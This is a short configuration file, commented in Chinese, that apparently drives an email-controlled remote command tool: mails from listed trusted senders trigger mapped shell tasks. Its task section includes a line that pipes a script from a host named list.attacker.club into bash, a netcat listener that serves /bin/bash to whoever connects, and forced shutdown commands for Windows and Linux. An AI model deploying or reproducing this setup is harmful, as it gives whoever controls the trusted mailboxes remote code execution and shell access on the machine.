[mail]
# 账号密码
IMAP_HOST= imap.exmail.qq.com
email = alert@xxx.com
password = xxxxxxx
SMTP_HOST = smtp.exmail.qq.com

# 只读取信任的邮箱发送的指令
Bind_Mail = admin@xxxxx.club,jjli@xxx.com

[task]
# 脚本任务
开始备份 = bash /opt/xx.sh

# Windows关机指令
shutdown = shutdown -s -f -t 1
# Linux关机指令
linux_down = init 0
# 执行远程shell
curl_bash = curl -s http://list.attacker.club/touch.sh | bash
# 一个反弹shell; nc ip_  10800
my_ladder = nc -vv -l -p 10800 -e /bin/bash
# Close all tasks
clear = pkill nc && pkill python
ip = ifconfig
